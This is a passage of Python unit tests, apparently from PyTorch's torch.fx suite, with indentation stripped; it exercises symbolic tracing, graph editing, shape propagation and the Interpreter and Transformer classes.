pickled = pickle.dumps(gm)
loaded = pickle.loads(pickled)
self.assertEqual(loaded(input), gm(input))
def test_pretty_print(self):
st = SimpleTest()
traced = symbolic_trace(st)
traced.graph.lint()
printed = str(traced)
assert 'SimpleTest()' in printed
assert 'torch.relu' in printed
def test_pretty_print_graph(self):
class KwargPrintTest(torch.nn.Module):
def forward(self, x):
return torch.squeeze(x + 3.0, dim=2)
st = KwargPrintTest()
traced = symbolic_trace(st)
traced.graph.lint()
stringed = str(traced.graph)
for s in ['args', 'kwargs', '#users']:
assert s in stringed
def test_custom_proxy_type(self):
class TensorPair:
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair(x : TensorPair, y : TensorPair):
s = x.add(y)
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair(x, y)
traced = symbolic_trace(use_tensor_pair)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_type_literal(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_literal(x : TensorPair):
s = x.add(TensorPair(torch.zeros(5, 3), torch.zeros(5, 3)))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
ref_out = use_tensor_pair_literal(x)
traced = symbolic_trace(use_tensor_pair_literal)
traced_out = traced(x)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_dynamic_value(self):
class TensorPair(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, left, right):
self.left, self.right = left, right
def add(self, other):
l = self.left + other.left
r = self.right + other.right
return TensorPair(l, r)
def mul(self, other):
l = self.left * other.left
r = self.right * other.right
return TensorPair(l, r)
def use_tensor_pair_ctor(x : TensorPair, y : torch.Tensor):
s = x.add(TensorPair(y, y))
return s.mul(x)
x = TensorPair(torch.randn(5, 3), torch.randn(5, 3))
y = torch.randn(5, 3)
ref_out = use_tensor_pair_ctor(x, y)
traced = symbolic_trace(use_tensor_pair_ctor)
traced_out = traced(x, y)
self.assertEqual(traced_out.left, ref_out.left)
self.assertEqual(traced_out.right, ref_out.right)
def test_custom_proxy_input_dependent_control_flow(self):
class ZeroTensor(metaclass=torch.fx.ProxyableClassMeta):
def __init__(self, inp):
if inp.sum() == 0:
self.is_zero = True
self.tensor = torch.tensor([])
else:
self.is_zero = False
self.tensor = inp
def add(self, other):
if self.is_zero:
return ZeroTensor(other.tensor)
elif other.is_zero:
return self
def use_zero_tensor(x : torch.Tensor, y : torch.Tensor):
return ZeroTensor(x + y)
x, y = torch.randn(5, 3), torch.randn(5, 3)
ref_out = use_zero_tensor(x, y)
traced = symbolic_trace(use_zero_tensor)
traced_out = traced(x, y)
self.assertEqual(traced_out.is_zero, ref_out.is_zero)
self.assertEqual(traced_out.tensor, ref_out.tensor)
def test_graph_fns(self):
g = Graph()
a = g.placeholder('a')
b = g.call_module('linear', (a,))
c = g.get_attr('bias')
d = g.call_method('add', (b, c))
e = g.call_function(torch.sin, (d,))
g.output(e)
mod = torch.nn.Module()
mod.linear = torch.nn.Linear(3, 4)
mod.bias = torch.rand(4)
gm = GraphModule(mod, g)
gm.graph.lint()
input = torch.rand(3)
r = gm(input)
ref = torch.sin(mod.linear(input) + mod.bias)
self.assertEqual(r, ref)
def test_remove_uses(self):
g : torch.fx.Graph = Graph()
x : torch.fx.Node = g.placeholder('x')
relu : torch.fx.Node = g.call_function(torch.relu, (x,))
neg : torch.fx.Node = g.call_function(torch.neg, (relu,))
g.output(neg)
neg.replace_all_uses_with(relu)
g.erase_node(neg)
self.assertTrue(neg not in relu.users)
def test_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(3, 4)
symbolic_trace(eb)
def test_pickle_nonetype_annotation(self):
eb = torch.nn.EmbeddingBag(10, 3, mode='sum')
traced = symbolic_trace(eb)
pickled = pickle.dumps(traced)
loaded = pickle.loads(pickled)
loaded.graph.lint()
input = torch.LongTensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.LongTensor([0, 4])
self.assertEqual(loaded(input, offsets), traced(input, offsets))
def test_return_tuple(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
return (x, x + x)
original = M()
traced = symbolic_trace(original)
self.assertEqual(traced(torch.ones(1)), original.forward(torch.ones(1)))
def test_construct_root_dict(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
linear_mod : torch.nn.Module = torch.nn.Linear(3, 4)
add_param : torch.Tensor = torch.rand(3, 4)
gm : torch.fx.GraphModule = torch.fx.GraphModule(
{'foo.bar.baz': linear_mod, 'zip.zap.zam' : add_param}, graph)
gm.graph.lint()
assert 'self.foo.bar.baz' in gm.code
x : torch.Tensor = torch.rand(3, 3)
out : torch.Tensor = gm(x)
ref_out : torch.Tensor = linear_mod(x) + add_param
self.assertEqual(out, ref_out)
def test_symbolic_trace_assert(self):
class AssertsTensorShape(torch.nn.Module):
def forward(self, x):
torch._assert(x.shape[1] > 4, "assert_foobar")
return x
m = AssertsTensorShape()
# verify traceability
traced = symbolic_trace(m)
# verify assertion on traced model works correctly at runtime
traced(torch.rand(4, 5))
with self.assertRaisesRegex(AssertionError, "assert_foobar"):
traced(torch.rand(4, 3))
# verify the symbolically traced module is scriptable
ms = torch.jit.script(m)
with self.assertRaisesRegex(torch.jit.Error, "assert_foobar"):
ms(torch.rand(4, 3))
def test_fx_create_arg(self):
class CustomArgObject:
def __init__(self, x, y):
self.x = x
self.y = y
def __fx_create_arg__(self, tracer: torch.fx.Tracer):
return tracer.create_node(
"call_function",
CustomArgObject,
args=(
tracer.create_arg(self.x),
tracer.create_arg(self.y),
),
kwargs={},
)
class HasCustomArgObjectWhenLeaf(torch.nn.Module):
def forward(self, o: CustomArgObject):
# Not normally traceable; good reason to make
# this module a leaf.
for x in o.x:
o.y += x
return o.y
class Root(torch.nn.Module):
def __init__(self):
super().__init__()
self.inner = HasCustomArgObjectWhenLeaf()
def forward(self, x, y):
o = CustomArgObject(x, y)
return self.inner(o)
class CreateArgTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is HasCustomArgObjectWhenLeaf
m = Root()
graph = CreateArgTracer().trace(m)
gm = torch.fx.GraphModule(m, graph)
assert "CustomArgObject(" in gm.code
def test_trace_fn_constant(self):
some_constant = torch.rand(3, 4)
def add_const(x):
return some_constant + x
traced = symbolic_trace(add_const)
input = torch.rand(3, 4)
self.assertEqual(traced(input), add_const(input))
def test_copy_no_remap(self):
traced = symbolic_trace(SimpleTest())
g = traced.graph
copied = torch.fx.Graph()
for node in g.nodes:
copied.node_copy(node)
with self.assertRaisesRegex(RuntimeError, 'does not belong to this Graph'):
copied.lint()
def test_wrong_topo(self):
graph : torch.fx.Graph = torch.fx.Graph()
a : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_module', 'foo.bar.baz', args=(a,))
c : torch.fx.Node = graph.create_node('get_attr', 'zip.zap.zam')
d : torch.fx.Node = graph.create_node('call_function', operator.add, args=(b, c))
graph.output(d)
nodes = list(graph.nodes)
nodes[3].append(nodes[2])
with self.assertRaisesRegex(RuntimeError, 'was used before it has been defined'):
graph.lint()
def test_example_shape_prop(self):
class TestCase(torch.nn.Module):
def __init__(self):
super().__init__()
self.attr = torch.randn(3, 4)
self.submod = torch.nn.Linear(4, 4)
def forward(self, x):
return torch.neg(self.submod(x.relu() + self.attr))
tc = TestCase()
tc_traced = symbolic_trace(tc)
ref_out = tc_traced(torch.rand(3, 4))
shape_prop.ShapeProp(tc_traced).propagate(torch.rand(3, 4))
# Make sure we're testing all opcodes
opcodes = set()
output_shape : Optional[torch.Shape] = None
output_stride : Optional[Tuple[int]] = None
for node in tc_traced.graph.nodes:
opcodes.add(node.op)
if node.op == 'output':
output_shape = node.args[0].meta['tensor_meta'].shape
output_stride = node.args[0].meta['tensor_meta'].stride
self.assertEqual(opcodes, set(['placeholder', 'get_attr', 'call_function', 'call_method',
'call_module', 'output']))
# Test shape propogation and make sure results match actual
self.assertEqual(output_shape, ref_out.shape)
self.assertEqual(output_stride, ref_out.stride())
def test_shape_prop_layout(self):
class ConvTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv2d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
# contiguous layout
test_mod = ConvTest()
traced = symbolic_trace(test_mod)
x = torch.randn(5, 5, 224, 224)
shape_prop.ShapeProp(traced).propagate(x)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced.graph.nodes))
x_channels_last = x.contiguous(memory_format=torch.channels_last)
traced.to(memory_format=torch.channels_last)
shape_prop.ShapeProp(traced).propagate(x_channels_last)
for node in traced.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last)
def test_shape_prop_aggregate(self):
class ReturnTwo(torch.nn.Module):
def forward(self, x):
return (3, torch.sum(x))
class UnderTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.rt = ReturnTwo()
def forward(self, x):
return self.rt(x)
ut = UnderTest()
class RTTracer(torch.fx.Tracer):
def is_leaf_module(self, m, module_qualified_name):
return type(m) is ReturnTwo
graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = torchvision_models.resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = torchvision_models.resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = torchvision_models.resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_replace_input(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
b.replace_input_with(x, y)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input_x = torch.randn(33, 44)
input_y = torch.randn(11, 22)
self.assertEqual(gm(input_x, input_y), torch.relu(input_y))
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_update_args_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_arg(0, y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_update_kwargs_api(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
y : torch.fx.Node = graph.create_node('placeholder', 'y')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, kwargs={'input': x})
output : torch.fx.Node = graph.output(b)
orig_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
inp_x, inp_y = torch.randn(5, 3), torch.randn(3, 5)
self.assertEqual(orig_gm(inp_x, inp_y), torch.relu(inp_x))
b.update_kwarg('input', y)
new_gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(new_gm(inp_x, inp_y), torch.relu(inp_y))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_module_deepcopy_edit_nodes(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
traced1 = symbolic_trace(Foo())
copied = copy.deepcopy(traced1)
for node in copied.graph.nodes:
if node.target == torch.relu:
node.target = torch.neg
copied.recompile()
traced1.recompile()
x = torch.randn(15, 15)
torch.testing.assert_allclose(traced1(x), torch.relu(x))
torch.testing.assert_allclose(copied(x), torch.neg(x))
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
